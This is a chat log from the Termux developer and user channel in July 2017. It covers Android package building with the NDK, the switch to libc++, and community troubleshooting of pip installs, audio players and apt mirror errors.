2017-07-15 00:47:55 live_the_dreams non clang include ../../lib/gcc/@TERMUX_HOST_PLATFORM@/4.9.x/include/stddef.h
2017-07-15 00:48:53 gitter (vishalbiswas) live_the_dreams:i just surrounded #include_next directive with #ifdef CLANG
2017-07-15 00:49:55 live_the_dreams the guy in charge of ndk … said to do something else
2017-07-15 00:49:55 live_the_dreams but whatever
2017-07-15 00:50:53 gitter (vishalbiswas) -nostdinc then add 4.9.x/include to CPPFLAGS
2017-07-15 00:51:28 gitter (vishalbiswas) I’
2017-07-15 00:51:56 gitter (vishalbiswas) i actually think thats the proper solution (not a huge fan of patches)
2017-07-15 00:54:59 live_the_dreams there are somethings that compile that do no like flags
2017-07-15 00:54:59 live_the_dreams at all
2017-07-15 00:54:59 live_the_dreams and just ignore it
2017-07-15 00:56:16 gitter (vishalbiswas) sometimes I think porting is a hobby I decided to take just to torture myself
2017-07-15 01:19:18 rods-tab3 self flagellation is its own reward
2017-07-15 02:02:12 gitter (vishalbiswas) rods-tab3: I’m not sure about that
2017-07-15 03:03:30 gitter (rnauber) @Grimler91 please try his PR for ghostscript: https://github.com/termux/termux-packages/pull/1134
2017-07-15 03:48:06 gitter (fornwall) @vishalbiswas https://developer.android.com/ndk/guides/standalone_toolchain.html`Also, make sure to provide the following two flags to the linker: -march=armv7-a -Wl,–fix-cortex-a8.
2017-07-15 03:48:06 gitter (fornwall)
2017-07-15 03:48:06 gitter (fornwall) The first flag instructs the linker to pick toolchain libraries which are tailored for armv7-a. The 2nd flag is required as a workaround for a CPU bug in some Cortex-A8 implementations.```
2017-07-15 03:48:42 gitter (vishalbiswas) @fornwall I get unrecognized option in sometimes
2017-07-15 03:49:02 gitter (vishalbiswas) shouldn’t it be –fix-cortex-a8
2017-07-15 03:49:13 gitter (vishalbiswas) instead of -Wl,–fix-cortex-a8?
2017-07-15 03:51:51 gitter (fornwall) hm, I guess so, when passed to the linker
2017-07-15 03:53:59 gitter (fornwall) looking at wikipedia it seems that Cortex-A8 is an old cpu, used in e.g. the first galaxy s (2010) phone and the motorola droid (2009)
2017-07-15 03:54:23 gitter (fornwall) so I suspect that it’s not really that relevant today
2017-07-15 03:56:23 gitter (vishalbiswas) @fornwall don’t think there’s Android 5.0 for any Cortex-A8s
2017-07-15 03:56:55 gitter (fornwall) it doesn’t look that way. let’s drop fix-cortex-a8?
2017-07-15 03:57:18 gitter (vishalbiswas) okay
2017-07-15 03:59:48 gitter (fornwall) done!
2017-07-15 04:27:28 gitter (fornwall) on another build note, recently support for specifying that a package should be built against a newer android api level, such as in TERMUX_PKG_API_LEVEL=23
2017-07-15 04:28:18 gitter (fornwall) it’s not used yet in any package, as running the resulting package will cause link failures on older android versions if any new function in libc is used
2017-07-15 04:30:38 gitter (fornwall) but it can be interesting to experiment with, and if necessary we could start accepting new packages requiring a higher api level, as we start moving towards deprecating android 5.x support
2017-07-15 04:32:00 gitter (vishalbiswas) lollipop is still around 30%
2017-07-15 04:35:43 gitter (fornwall) right, we shouldn’t drop support for it 5.x suddenly, just plan for it sometimes in the future
2017-07-15 04:36:48 gitter (fornwall) the libc++ transition is now live in the package repository and is only a pkg up
away!
2017-07-15 04:37:59 gitter (vishalbiswas) … and a 100 mb upgrade away!
2017-07-15 04:38:01 gitter (fornwall) the libgnustl
package remains installed, but it has been marked as non-essential and can now be uninstalled as nothing in a termux package links against it (but c++ programs built on the device probably does, so needs to be rebuilt)
2017-07-15 04:38:02 gitter (fornwall) :)
2017-07-15 04:38:49 gitter (vishalbiswas) that’s not so bad, considering I do 500 mb upgrades on my desktop every week
2017-07-15 04:39:13 gitter (fornwall) arch linux :)?
2017-07-15 04:40:11 gitter (vishalbiswas) yes, and you should switch to PKGBUILDs
2017-07-15 04:40:20 gitter (vishalbiswas) ;)
2017-07-15 04:51:59 Grimler about ghostscript, could someone else with an arm device try building and starting ghostscript with the commit submitted by rnauber?
2017-07-15 04:55:57 live_the_dreams really odd gcc-6 builds but not gcc-7
2017-07-15 04:55:57 live_the_dreams fails tests … thats why
2017-07-15 05:00:14 gitter (vishalbiswas) live_the_dreams: tests?
2017-07-15 05:01:03 live_the_dreams config tests
2017-07-15 05:01:03 live_the_dreams thinking things aren’t defined which are
2017-07-15 05:22:42 fornwall live_the_dreams: which functions?
2017-07-15 05:23:24 live_the_dreams its a weird link error
2017-07-15 05:23:24 live_the_dreams probably something simple
2017-07-15 05:33:11 frumpylava > 50 packages can be upgraded
2017-07-15 05:33:19 frumpylava lol
2017-07-15 05:35:36 live_the_dreams building
2017-07-15 05:36:11 gitter (vishalbiswas) mine was 76.4 mb
2017-07-15 05:46:47 live_the_dreams ooo we might finally have an updated apt?
2017-07-15 06:21:31 fornwall live_the_dreams: yes, hopefully with a bit cleaner build and less patches :)
2017-07-15 06:23:23 live_the_dreams hmmm had not load termux.spec to build gcc-7 …
2017-07-15 06:23:23 live_the_dreams lovely non pie binaries
2017-07-15 06:23:23 live_the_dreams …
2017-07-15 06:34:01 gitter (vishalbiswas) live_the_dreams did you change your gpg key for termux repo?
2017-07-15 06:35:14 gitter (vishalbiswas) WARNING: apt does not have a stable CLI interface. Use with caution in scripts.
2017-07-15 06:35:14 gitter (vishalbiswas)
2017-07-15 06:35:14 gitter (vishalbiswas) Hit:1 http://termux.net stable InRelease
2017-07-15 06:35:14 gitter (vishalbiswas) [full message: https://gitter.im/termux/termux?at=5969efe04bcd78af56b11b73]
2017-07-15 06:41:40 live_the_dreams updating atp
2017-07-15 06:41:40 live_the_dreams changes key?
2017-07-15 06:41:43 live_the_dreams apt-key add pointless.gpg orwhatever
2017-07-15 08:05:40 gitter (Grimler91) I tried converting a pdf to a jpg now that ghostscript is working (wohoo!) but I got this error:
2017-07-15 08:05:40 gitter (Grimler91) CANNOT LINK EXECUTABLE: could not load library “libMagickCore-7.Q16HDRI.so” needed by “convert”; caused by cannot locate symbol “catopen” referenced by “libMagickCore-7.Q16HDRI.so”…
2017-07-15 08:05:40 gitter (Grimler91) Which library contains catopen? libandroid-support?
2017-07-15 08:05:40 gitter (Grimler91)
2017-07-15 08:33:51 gitter (fornwall) @Grimler91 thanks! it was in libandroid-support, but libandroid-support has been purged from catopen/catclose/catgets and some other minor things (they were just broken stubs there anyway)
2017-07-15 08:34:06 gitter (fornwall) imagemagick manages fine without it, it just needs a rebuild, I’m doing it now!
2017-07-15 08:41:19 gitter (Grimler91) @fornwall Great!
2017-07-15 09:22:39 gitter (fornwall) @Grimler91 should be fixed now, does it work?
2017-07-15 09:29:38 gitter (Grimler91) @fornwall yes, it works as expected!
2017-07-15 14:09:16 kspencer signed up for beta
2017-07-15 23:24:10 gitter (vishalbiswas) @fornwall how do you propose we solve the stddef include error? live_the_dreams suggestion of patching it works perfectly for me.
2017-07-15 23:24:33 live_the_dreams im going to submit a patch
2017-07-15 23:25:19 live_the_dreams but yeah cstddef needs to be patched for g++ to work in standalone
2017-07-15 23:27:22 gitter (vishalbiswas) live_the_dreams currently the patch step in build-package has relative patches from the sysroot dir, and this header is outside it
2017-07-15 23:28:11 live_the_dreams i know iv already done that bit as well
2017-07-15 23:28:55 gitter (vishalbiswas) I really think we need a TERMUX_PKG_BUILDCACHE, to save files to be used in subsequent builds like in CI
2017-07-15 23:30:09 gitter (vishalbiswas) is there an atexit function or similar in shell scripting?
2017-07-15 23:32:15 live_the_dreams trap ?
2017-07-15 23:34:44 gitter (vishalbiswas) trap EXIT function_name right?
2017-07-15 23:35:05 gitter (vishalbiswas) or trap function_name EXIT
2017-07-15 23:37:38 live_the_dreams it works on signals
2017-07-15 23:37:53 gitter (vishalbiswas) https://stackoverflow.com/questions/2129923/bash-run-command-before-a-script-exits
2017-07-15 23:38:12 gitter (vishalbiswas) man trap says EXIT is a special symbol
2017-07-15 23:38:29 live_the_dreams ok
2017-07-15 23:51:35 gitter (vishalbiswas) when it restores the cache, if the build is happening in src and a cached file already exists in src, should it overwrite it with the cached one?
2017-07-16 00:51:42 gitter (netw0rm) hi
2017-07-16 00:57:39 live_the_dreams hello
2017-07-16 01:20:54 gitter (netw0rm) pip install pynacl ..error
2017-07-16 01:21:21 gitter (netw0rm) how can i do
2017-07-16 14:41:20 gitter (AshleyNykiel) Error installing Python2 packages via pip2, device running Android 5.1.1 (arm) / Termux 0.53, was able to install pymysql without out any problems, how do I fix this?
2017-07-16 14:41:20 gitter (AshleyNykiel)
2017-07-16 14:41:20 gitter (AshleyNykiel) pip2 install -U psycopg postgres
2017-07-16 14:41:20 gitter (AshleyNykiel) [full message: https://gitter.im/termux/termux?at=596bb350bc46472974f65888]
2017-07-16 19:11:22 gitter (ackalker) I’m back working on audio for Termux, sorry for the loooong absence.
2017-07-16 19:27:51 live_the_dreams oh shit
2017-07-16 19:27:51 live_the_dreams good to see you back
2017-07-16 19:28:58 live_the_dreams in your absense i got boost and then mpd ncmpcpp working at which point you will fix what i screwed up
2017-07-16 19:47:10 aleph- Lulz
2017-07-16 19:47:10 aleph- Welcome back.
2017-07-16 21:09:01 XandriX o/ all
2017-07-16 21:16:26 XandriX can one setup his own termux mirror if one would decide to start building and testing packages before even daring to publish them
2017-07-16 22:03:29 live_the_dreams yes
2017-07-16 22:03:31 live_the_dreams XandriX: look up reprepro
2017-07-16 22:03:42 live_the_dreams any apt setup should do
2017-07-16 22:04:25 live_the_dreams and just change sources.list on the device
2017-07-17 01:15:03 Fawch3d hello… how to install metasploit in termux?
2017-07-17 01:19:03 gitter (vishalbiswas) Fawch3d: wiki.termux.com/Metasploit
2017-07-17 01:57:44 frumpylava live_the_dreams: Is “mkdir -p ~/music” in mpd still required? I think the default location now points to /sdcard/music anyway.
2017-07-17 01:58:27 live_the_dreams get rid of it
2017-07-17 01:59:15 live_the_dreams i need to go through that and redo some bits
2017-07-17 01:59:15 live_the_dreams if you want to fix iup go ahead
2017-07-17 02:10:16 frumpylava live_the_dreams: Created a pull request to remove that.
2017-07-17 02:25:23 frumpylava @vishalbiswas Did you ever continue with dovecot?
2017-07-17 04:38:13 gitter (oguz-ismail) I have compiled a simple hello
2017-07-17 04:38:16 gitter (oguz-ismail) world
2017-07-17 04:38:36 gitter (oguz-ismail) example from termux. but when i try to
2017-07-17 04:38:57 gitter (oguz-ismail) run it from within another android app, it says
2017-07-17 04:39:01 gitter (oguz-ismail) CANNOT LINK EXECUTABLE: library “libc++_shared.so” not found
2017-07-17 04:39:01 gitter (oguz-ismail)
2017-07-17 04:39:01 gitter (oguz-ismail)
2017-07-17 04:39:09 gitter (oguz-ismail) what’s the problem ?
2017-07-17 05:55:56 gitter (Grimler91) Are se building packages as root again or is it something wrong with my docker? sudo ./scripts/run-docker.sh
logs me in as root.
2017-07-17 05:59:22 live_the_dreams is it logging in as current user?
2017-07-17 06:00:13 live_the_dreams so not do sudo
2017-07-17 06:04:50 gitter (Grimler91) live_the_dreams: I could setup docker to work as current user but it’s not recommended afaik (https://askubuntu.com/questions/477551/how-can-i-use-docker-without-sudo). Previously sudo ./scripts/run-docker.sh
logged me in as user “builder”
2017-07-17 06:21:33 gitter (Grimler91) guess this could be related to the recent changes to run-docker.sh (e.g. https://github.com/termux/termux-packages/commit/e3f9f42f4dd6457fdaac5da55150fa2280621415). I’ll try to look into it.
2017-07-17 06:35:42 gitter (Grimler91) going back to before those changes makes it work as before (not really surprising)
2017-07-17 07:44:19 masterkorp hello
2017-07-17 07:51:03 live_the_dreams ello
2017-07-17 11:33:40 gitter (fornwall) @Grimler91 ah, that’s unfortunate with docker and root. I run docker as non-root so didn’t notice
2017-07-17 12:10:04 gitter (prinxy) Hello am trying to install tkinter using pip but am getting errors
2017-07-17 12:17:34 gitter (marvin-littlewood) Hello! Love Termux but…
2017-07-17 12:18:22 gitter (marvin-littlewood) Have to add -lgnustl_shared to make my previously working code run without SIGSEGV.
2017-07-17 12:19:05 gitter (marvin-littlewood) Seems like the symbolic link in $PREFIX/lib for libstdc++ has gone after last updatge
2017-07-17 12:20:57 gitter (marvin-littlewood) (Was fixed in issue #33)
2017-07-17 12:29:57 gitter (vishalbiswas) @marvin-littlewood termux has switched to libc++, so now you can compile by adding -lc++_shared
2017-07-17 12:53:48 gitter (marvin-littlewood) Thanks but that gives SIGSEGV - only gnustl works at present. NB was using the default toolchain detected by cmake.
2017-07-17 13:16:04 gitter (vishalbiswas) @marvin-littlewood you can install libgnustl_shared from apt
2017-07-17 13:17:50 gitter (marvin-littlewood) @vishalbiswas
2017-07-17 13:18:37 gitter (AshleyNykiel) Error while installing some Python packages via pip - unable to execute ‘-DNDEBUG’: No such file or directory, how do I fix this?
2017-07-17 13:19:53 gitter (marvin-littlewood) @vishalbiswas Oops hit the wrong key! When did the switch happen?
2017-07-17 13:24:41 gitter (vishalbiswas) @marvin-littlewood https://github.com/termux/termux-packages/commit/d946e67c5b86dd990ffa0e5654b2a514b787aeb9
2017-07-17 13:25:22 gitter (vishalbiswas) @AshleyNykiel what are you trying to install?
2017-07-17 13:27:54 gitter (AshleyNykiel) postgres and psycopq
2017-07-17 13:28:11 gitter (AshleyNykiel) oops psycopg
2017-07-17 13:32:19 gitter (vishalbiswas) pip2 or pip3?
2017-07-17 13:35:33 gitter (AshleyNykiel) pip2 mainly, however would also like to install via pip3 as well
2017-07-17 13:36:03 gitter (vishalbiswas) ```-bash-4.4$ pip2 install postgres
2017-07-17 13:36:04 gitter (vishalbiswas) Collecting postgres
2017-07-17 13:36:04 gitter (vishalbiswas) Downloading postgres-2.2.1.tar.gz
2017-07-17 13:36:04 gitter (vishalbiswas) [full message: https://gitter.im/termux/termux?at=596cf5830de4d2545e382605]
2017-07-17 13:36:24 gitter (vishalbiswas) installed successfully
2017-07-17 13:39:45 gitter (AshleyNykiel) Command “/data/data/com.termux/files/usr/bin/python2 -u -c “import setuptools, tokenize;file=’/data/data/com.termux/files/usr/tmp/pip-build-7WEcji/psycopg2/setup.py’;f=getattr(tokenize, ‘open’, open)(file);code=f.read().replace(‘\r\n’, ‘\n’);f.close();exec(compile(code, file, ‘exec’))” install –record /data/data/com.termux/files/usr/tmp/pip-DH_vGw-record/install-record.txt –single-version-externally-managed –com
2017-07-17 13:39:45 gitter /data/data/com.termux/files/usr/tmp/pip-build-7WEcji/psycopg2/
2017-07-17 13:41:54 gitter (vishalbiswas) what’s before it?
2017-07-17 13:46:14 gitter (AshleyNykiel) Failed building wheel for psycopg2
2017-07-17 13:46:14 gitter (AshleyNykiel) Running setup.py clean for psycopg2
2017-07-17 13:46:14 gitter (AshleyNykiel) Failed to build psycopg2
2017-07-17 13:46:14 gitter (AshleyNykiel) [full message: https://gitter.im/termux/termux?at=596cf7e576a757f8081cd6b6]
2017-07-17 13:47:03 gitter (vishalbiswas) this is not the complete output?
2017-07-17 13:49:41 gitter (AshleyNykiel) Failed building wheel for psycopg2
2017-07-17 13:49:41 gitter (AshleyNykiel) Running setup.py clean for psycopg2
2017-07-17 13:49:41 gitter (AshleyNykiel) Failed to build psycopg2
2017-07-17 13:49:41 gitter (AshleyNykiel) [full message: https://gitter.im/termux/termux?at=596cf8b41c8697534a32c9db]
2017-07-17 13:50:01 gitter (vishalbiswas) use pastebin
2017-07-17 14:11:40 lpelp Hey, I have a question. Is there some way to get ‘let’ command in sh for termux? :)
2017-07-17 14:19:01 gitter (AshleyNykiel) Sorry, https://pastebin.com/bf7zstur
2017-07-17 14:20:40 gitter (vishalbiswas) what’s your env
?
2017-07-17 14:20:46 gitter (vishalbiswas) seems like you have set the CC var
2017-07-17 15:21:45 frumpylava What are you guys’ most important packages? I am compiling a list for my upcoming presentation with termux’ most popular packages.
2017-07-17 15:25:22 gitter (vishalbiswas) frumpylava: i’ll have a build of dovecot for you tomorrow
2017-07-17 15:28:48 frumpylava @vishalbiswas Awesome \o/
2017-07-17 15:32:20 frumpylava I already have “bash,fish,zsh,python,python2,ruby,perl,php,clang,golang,nodejs,vim,neovim,emacs,tmux,screen,openssh,coreutils,texlive”. Anything important that I am missing?
2017-07-17 15:42:59 rods-tab3 gawk
2017-07-17 15:47:22 CrunchyBearFlake hey guys. i’m trying to install scrapy and getting an error that it can’t find libxml/xpath. I have libxml2-dev libffi-dev and openssl-dev installed.
2017-07-17 15:47:29 CrunchyBearFlake i opened a ticket on github
2017-07-17 15:50:46 frumpylava rods-tab3: thanks. I added that.
2017-07-17 16:02:20 rods-tab3 yyyou left out the most important one: ‘‘man’’ ::–))
2017-07-17 16:03:37 frumpylava :O
2017-07-17 16:05:43 rods-tab3 others: apt busybox dash htop man termux-api termux-tools vtutils tracepath
2017-07-17 16:07:38 rods-tab3 installed but hardly used: nano weechat
2017-07-17 16:08:47 gitter (AshleyNykiel) unalias CC
2017-07-17 16:08:47 gitter (AshleyNykiel) unalias CPP
2017-07-17 16:08:47 gitter (AshleyNykiel)
2017-07-17 16:08:47 gitter (AshleyNykiel) [full message: https://gitter.im/termux/termux?at=596d194e76a757f8081d6fdd]
2017-07-17 16:09:51 gitter (AshleyNykiel) Oops
2017-07-17 16:09:55 gitter (AshleyNykiel) export CC=””
2017-07-17 16:09:55 gitter (AshleyNykiel) export CPP=””
2017-07-17 16:09:55 gitter (AshleyNykiel)
2017-07-17 16:09:55 gitter (AshleyNykiel) [full message: https://gitter.im/termux/termux?at=596d19922723db8d5e1e1d15]
2017-07-17 16:11:10 gitter (AshleyNykiel) What are the recommended settings for this if I’d like to compile apps on my device?
2017-07-17 16:14:15 gitter (AshleyNykiel) I’d love to see MongoDB added to the wishlist :-)
2017-07-17 16:16:41 gitter (AshleyNykiel) Where is the php ini file located so I can add the Postgres drivers to it, didn’t see one installed?
2017-07-17 16:37:51 rods-tab3 also frump - termux widgets and termux style
2017-07-17 16:47:57 frumpylava rods-tab3: yeah, these are whole sections on my presentation.
2017-07-17 17:01:44 gitter (prinxy) Can I used tkinter module on termux ?
2017-07-17 17:30:52 gitter (TilliWilli5) guys, are there any methods of adding Termux app to autostartup of system (android)? Better without rooting of a device?! And without 3rd-party app - just using bash scripts or modifying source code of the project?!
2017-07-17 17:36:35 gitter (prinxy) Trying to pip install tkinter but I get this message:
2017-07-17 17:36:42 gitter (prinxy) Could not find a version that satisfies the requirement tkinter (from versions: )
2017-07-17 17:36:42 gitter (prinxy) No matching distribution found for tkinter
2017-07-17 17:36:48 gitter (prinxy) …….
2017-07-17 17:37:03 gitter (prinxy) Anyway to resolve this
2017-07-17 17:54:42 fornwall frumpylava: mosh!
2017-07-17 18:03:34 rods-tab3 frumpylava – would say mksh - but then that comes with android; is your presentation online ?
2017-07-17 19:19:54 rods-tab3 shouldn’t gawk be mentioned in 3.1 https://wiki.termux.com/wiki/Main_Page ??
2017-07-17 20:06:33 live_the_dreams frumpylava: if you are at a hacker confernce mention radare2
2017-07-17 20:13:26 live_the_dreams but don’t mention too much stuff
2017-07-17 23:22:34 gitter (prinxy) Someone should please answer me..
2017-07-17 23:22:50 gitter (prinxy) Trying to pip install tkinter but I get this message:
2017-07-17 23:22:50 gitter (prinxy) Could not find a version that satisfies the requirement tkinter (from versions: )
2017-07-17 23:22:50 gitter (prinxy) No matching distribution found for tkinter
2017-07-17 23:22:50 gitter (prinxy) …….
2017-07-17 23:23:13 gitter (prinxy) Anyway to resolve this
2017-07-17 23:33:35 live_the_dreams tkinter is graphical gui… we don’t have gui available
2017-07-17 23:51:40 gitter (vishalbiswas) @AshleyNykiel I tried mongodb. It depends on wiredtiger which only works on 64-bit devices. Unfortunately, I only have an ARMv7 (32-bit) device and launching up the emulator is no fun
2017-07-17 23:52:15 gitter (vishalbiswas) What is the output of env
before running that pip2 command?
2017-07-17 23:54:07 gitter (vishalbiswas) frumpylava: or metasploit, maybe even have a demo
2017-07-17 23:54:31 gitter (vishalbiswas) We have hydra too
2017-07-18 00:02:07 gitter (sdrausty) https://github.com/sdrausty has buildAPKs labeled as a different language.
2017-07-18 00:03:42 gitter (sdrausty) How to specify language per repository?
2017-07-18 00:05:30 gitter (vishalbiswas) @sdrausty That may have happened because of all example app code. You should have them in a separate repo and submodule it in the main one.
2017-07-18 00:08:28 gitter (sdrausty) @vishalbiswas I have been running into a number of misslabled repositories inasfaras language, https://github.com/sdrausty/buildAPKs and https://github.com/sdrausty/buildAPKs are not HTML
2017-07-18 00:09:02 gitter (sdrausty) Both these repositories are java.
2017-07-18 00:09:34 gitter (vishalbiswas) They are shell scripts
2017-07-18 00:09:57 gitter (vishalbiswas) A repo’s language is the language of code it consists of
2017-07-18 00:10:04 gitter (sdrausty) Where can I set language per repository?
2017-07-18 00:10:25 gitter (sdrausty) Is there any option?
2017-07-18 00:10:25 gitter (vishalbiswas) no way according to my knowledge
2017-07-18 00:10:39 gitter (vishalbiswas) Ask on stackoverflow
2017-07-18 00:11:37 gitter (sdrausty) *https://github.com/sdrausty/buildAPKsDebug
2017-07-18 00:54:49 gitter (vishalbiswas) frumpylava: https://drive.google.com/open?id=0B8Q4yBRb9PSHZTVpdFpVNmtPMHc
2017-07-18 02:10:08 frumpylava @vishalbiswas, live_the_dreams, fornwall: Thanks for the suggestions, I’ll add them to my presentation.
2017-07-18 02:12:59 frumpylava @vishalbiswas: Thanks. I installed it, but I am still getting CANNOT LINK EXECUTABLE “dovecot”: library “libdovecot.so” not found
2017-07-18 03:54:25 frumpylava live_the_dreams: What’s the difference between OpenSLES and OpenAL when it comes to mpd
2017-07-18 03:54:58 live_the_dreams same as mpv really
2017-07-18 03:55:26 frumpylava oh, and which is?
2017-07-18 03:55:29 live_the_dreams opensles is the native android openal emulations openal so it does things like emulate 5.1 surround better
2017-07-18 03:56:18 live_the_dreams don’t quote me on it
2017-07-18 03:56:22 frumpylava So, openal is better?
2017-07-18 03:56:45 live_the_dreams i think it uses more power … something
2017-07-18 03:57:19 live_the_dreams can’t think at the moment compiling R libraries on a mobile phone….
2017-07-18 04:02:04 frumpylava hmmm something like alsamixer, but for android’s various audio streams would be nice.
2017-07-18 05:22:23 frumpylava live_the_dreams: I think mpd needs format “44100:16:2” in the visualizer because ncmpcpp has set “visualizer_in_stereo = yes” by default, insteald of “44100:16:1”, which it has currently. But I am not sure what the numbers even mean, it just says so in the example config.
2017-07-18 05:22:44 live_the_dreams 44100 is bit rate
2017-07-18 05:22:51 live_the_dreams mhz
2017-07-18 05:23:21 live_the_dreams 16 bit
2017-07-18 05:23:25 live_the_dreams 2 = stereo
2017-07-18 05:23:57 frumpylava live_the_dreams: well yeah, then it definetly needs 2 instead of 1. Or change the setting in ncmpcpp
2017-07-18 05:25:11 live_the_dreams mpdconf.example.patch is the file you want to change the 1 to 2 in
2017-07-18 05:26:08 live_the_dreams i will let you have the honor of submitting the greatest patch ever
2017-07-18 05:26:11 live_the_dreams change 1 to 2
2017-07-18 07:04:50 frumpylava fornwall: Should we bump TERMUX_PKG_REVISION when making a pull request to a package or do you want to do that yourself?
2017-07-18 09:15:19 fornwall frumpylava: it’s great if it’s done as part of a pull request!
2017-07-18 09:22:32 BrainDamage live_the_dreams: you have a file conflict in your packages: http://codepad.org/NNKIkp7B
2017-07-18 09:50:31 frumpylava fornwall: great, then I shall continue doing so.
2017-07-18 10:58:08 Francy hi all HOw can I install cpan module with termux ?
2017-07-18 10:59:57 Francy any canche ?
2017-07-18 11:00:02 Francy chance^
2017-07-18 13:21:22 gitter (vishalbiswas) error: undefined reference to ‘__aeabi_unwind_cpp_pr0’ ideas?
2017-07-18 14:11:30 gitter (vishalbiswas) ignore it. just understood that using ld and clang as linker are two different things
2017-07-18 19:01:39 live_the_dreams BrainDamage: site won’t load which 2 packages in conflict?
2017-07-18 19:21:12 live_the_dreams github down?
2017-07-18 19:21:59 live_the_dreams the website anyway
2017-07-18 23:33:50 fidy hello how are we dooing?
2017-07-18 23:37:14 rods-tab3 wee dooing …
2017-07-18 23:39:59 fidy yeah crappy keyboard and poor checking before enter keying.
2017-07-19 00:04:54 rods-tab3 mmmme too; this bluetooth keyboard sleeps too soon and hard to wake up
2017-07-19 00:09:42 fidy robs-tab3 that sucks more, though i am using a soft keyboard on my phone running irssi.
2017-07-19 00:10:02 fidy soft keyboards = lame
2017-07-19 00:21:40 fidy well i hope it wasnt somwthing i said
2017-07-19 01:28:37 travisfw how do I open a file?
2017-07-19 01:34:04 gitter (vishalbiswas) error: no member named ‘fseeko64’ in the global namespace; did you mean ‘fseeko’?, shouldn’t it be defined to fseeko? I see int fseeko(FILE*, off_t, int) __RENAME(fseeko64);
in stdio.h
2017-07-19 02:43:22 csaba Hi folks, apt update fails due to “Hash sum mismatch”
2017-07-19 02:51:12 frumpylava fornwall: ping! Hash sum mustaches.
2017-07-19 02:51:21 frumpylava @fornwall: ping! Hash sum mustaches.
2017-07-19 02:52:59 frumpylava csaba: This happens occasionally. It’s a network problem relating to Cloudflare. We need to clear some caches or something. There is nothing YOU can do, it will probably be fixed in a few hours.
2017-07-19 02:54:26 csaba frumpylava: thanks. I noticed it already happening yesteday 10PM (UTC+2).
2017-07-19 02:57:02 frumpylava csaba: Yeah, I think it happens when a round of updates doesn’t get distributed evenly across cloudflare (I think). Thanks for bringing it to our attention. Now that we know about it we can fix it. We just need to wait for @fornwall to get online.
2017-07-19 02:58:29 csaba frumpylava: OK, I’m patient :)
2017-07-19 03:34:49 frumpylava Texlive is pretty cool. I am creating my presentation about Termux on Termux.
2017-07-19 03:39:01 gitter (vishalbiswas) frumpylava: mustaches? There’s even an issue about “Hash sum mustaches”
2017-07-19 03:39:54 fidy is there a good man page for the transmission package?
2017-07-19 03:40:46 frumpylava @vishalbiswas It’s a hilarious typo that I am now desperately trying to make an in-joke. ;)
2017-07-19 03:40:55 frumpylava fidy: man transmission-daemon
2017-07-19 03:42:15 fidy @frumpylav Thank you.
2017-07-19 04:00:09 gitter (vishalbiswas) frumpylava: about mysqli, i can build php-mysql with your original commit (unified headers). So….we need a third tester to see where is the problem
2017-07-19 04:05:40 frumpylava @vishalbiswas, can you send me the .deb package? Since I still can’t build it, I can’t even test it with the current mariadb version. Maybe the problem doesn’t even exist anymore.
2017-07-19 04:39:07 live_the_dreams hmm messing around with apt a bit since we got better c++ we can compile later versions
2017-07-19 04:40:41 gitter (vishalbiswas) live_the_dreams: aptitude?
2017-07-19 04:43:11 live_the_dreams nah haven;t done that yet
2017-07-19 04:43:11 live_the_dreams may have a go
2017-07-19 05:58:10 frumpylava live_the_dreams: Oh gawd. ncmpcpp looks so pretty after a bit of theming (@_@)
2017-07-19 06:04:56 gitter (vishalbiswas) no album art 0/10
2017-07-19 06:09:22 frumpylava @vishalbiswas, yeah, I was hoping for some caca album art, but I haven’t found a solution.
2017-07-19 06:28:56 live_the_dreams i was going to fix up default settings
2017-07-19 06:29:01 live_the_dreams but i got distracted
2017-07-19 06:32:17 frumpylava live_the_dreams: I’d suggest the following:
2017-07-19 06:32:22 frumpylava lines_scrolled = 1
2017-07-19 06:32:24 frumpylava mouse_support = yes
2017-07-19 06:32:26 frumpylava mouse_list_scroll_whole_page = no
2017-07-19 06:32:54 frumpylava This makes scrolling work one line at a time and makes it 1000% nices on a touchscreen.
2017-07-19 06:35:30 frumpylava I think it’s similar to how vim is configured by default on termux.
2017-07-19 06:51:55 Taosim can’t display image files by imagemagick in termux
2017-07-19 06:52:49 Taosim anybody knows the anwser
2017-07-19 06:54:04 Taosim who knows can send msg to me,pls,thx
2017-07-19 06:54:20 live_the_dreams what do you mean there is no image viewer in the terminal? …
2017-07-19 06:54:21 live_the_dreams xdg-open file
2017-07-19 10:06:03 BrainDamage live_the_dreams: install numpy & scipy, they drag in libgfortran and libgfortran4 which conflict over /data/data/com.termux/files/usr/lib/libgfortran.so
2017-07-19 11:12:26 gitter (vishalbiswas) what’s the diff between pcre and pcre2?
2017-07-19 14:11:26 BismuthBorealis hey, uh, is there any way I can use jre?
2017-07-19 17:55:59 gitter (fornwall) @vishalbiswas pcre2 is new, pcre is old :)
2017-07-19 17:56:02 gitter (fornwall) http://www.pcre.org
2017-07-19 17:56:24 gitter (fornwall) I guess it’s time to package pcre2
2017-07-19 17:58:17 live_the_dreams BrainDamage: aarch64 or arm?
2017-07-19 18:00:15 live_the_dreams no wait its aarch64
2017-07-19 18:00:17 live_the_dreams fixing now
2017-07-19 18:58:31 live_the_dreams well there we go i did the move libc++ the unified and libgfortran to libgfortran4 move in one big go
2017-07-19 20:23:48 mattfly hi
2017-07-19 20:24:06 mattfly wow there are indeed some people here
2017-07-19 20:24:44 mattfly how to enable to use the ctrl A key on termux wihiut alt?
2017-07-19 20:26:46 sdrausty mattfly: https://termux.com/touch-keyboard.html
2017-07-19 20:33:11 mattfly this is what i get when i hit ctrl a
2017-07-19 20:33:50 mattfly ctrl a is disabled, use ctrl alt a instead, or enable it in settings
2017-07-19 20:34:07 mattfly i see nothing about this in any setting
2017-07-19 20:35:18 fidy Quick question, is there a command line audio player?
2017-07-19 20:37:49 live_the_dreams mpv
2017-07-19 20:37:50 live_the_dreams there is also mpd which is a daemon
2017-07-19 20:38:26 mattfly this is cool
2017-07-19 20:38:42 mattfly wish i was able to use ctrl a directly :(
2017-07-19 22:00:14 live_the_dreams are you talking of hackers keyboard?
2017-07-19 22:08:23 live_the_dreams yeah that is a hackers keyboard message
2017-07-19 22:24:52 rods-tab3 iirc control-A is select all; with my BT keyboard, cursor goes to beginning of line
2017-07-19 22:52:43 th30nE how to set up a ssh connection to my home server?
2017-07-19 22:53:40 th30nE everytime I try to connect with ssh termux crashes!
2017-07-20 00:11:58 fidy_ hello all.
2017-07-20 00:14:00 fidy_ rods-tab3: You get that keyboard bit sorted?
2017-07-20 00:14:52 fidy_ On a different note, I was wondering if termux had a cli streaming audio package. Anyone know of one?
2017-07-20 00:22:38 live_the_dreams mpv does
2017-07-20 00:23:34 live_the_dreams unless you mean stream from termux
2017-07-20 00:29:37 fidy_ live_the_dreams: Yeah, I was hoping for something like that…
